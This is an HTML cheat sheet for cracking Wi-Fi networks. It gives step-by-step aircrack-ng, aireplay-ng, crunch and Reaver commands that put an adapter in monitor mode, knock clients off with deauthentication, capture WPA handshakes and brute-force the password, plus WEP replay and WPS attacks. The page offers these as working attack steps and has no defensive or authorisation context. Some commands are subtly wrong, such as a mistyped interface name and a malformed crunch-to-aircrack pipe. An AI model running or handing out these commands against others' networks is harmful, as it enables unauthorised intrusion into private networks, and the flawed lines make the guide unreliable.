<html>
    <head>
        <title>Hacking Wifi routers with WPA & WPA2 along with WEP</title>
        </head>
        
        <body>
            <h1>Hacking Wifi routers with WPA & WPA2 along with WEP</h1><br><br>
            <h2>Bring the interface up in monitor mode</h2>

> ifconfig wlan0 down<br><br>

> iwconfig wlan0 mode monitor<br><br>

> ifconfig wlan up<br><br>

<h2>Kill processes that shall or will interfere</h2>

> airmon-ng check wlan0<br><br>

> kill [PID]<br><br>

<h2>Now monitor the nearby Wifi routers</h2>

> airodump-ng wlan0<br><br>

<h2>Capture WPA Handshake by DeAuth'ing clients</h2>

> airodump-ng --channel [id] --bssid [bssid] -w [filename] wlan0<br><br>

> aireplay-ng -0 0 -a [bssid] wlan0<br><br><br>


<h2>BF on captured HS'ing signals</h2>

> crunch 8 8 12345678 | aircrack-ng -w [filename].cap -e [ssid]<br><br><br>

<h2>Bring interface up in monitor mode</h2>

> airmon-ng start wlan0<br><br>

<h2>Detecting available Wifi Routers</h2>

> airodump-ng mon0<br><br>

<h2>Setting adapter channel</h2>

> iwconfig mon0 channel [channel_number]<br><br>

<h2>Capture handshake by DeAuth'ing client</h2>

> airodump-ng -c [channel] -w [filename] --bssid [bssid] [interface]<br><br>

> aireplay-ng -3 -b [bssid] -h [mac_of_client] [interface]<br><br>

<h2>Capturing</h2>

> aircrack-ng -b [bssid] [filename-01.cap]<br><br>

> airmon-ng start wlan0<br><br>
> airodump-ng wlan0<br><br>
> reaver -i mon0 -b [bssid] -vv<br><br>

<h4>Reaver and crunch are used for password cracking along with wordlists which may or may not be required, plz note that John can also be used as per the choice of the user, FYI.</h4>

*.cap files can be directly attacked by John.

            </body>
    </html>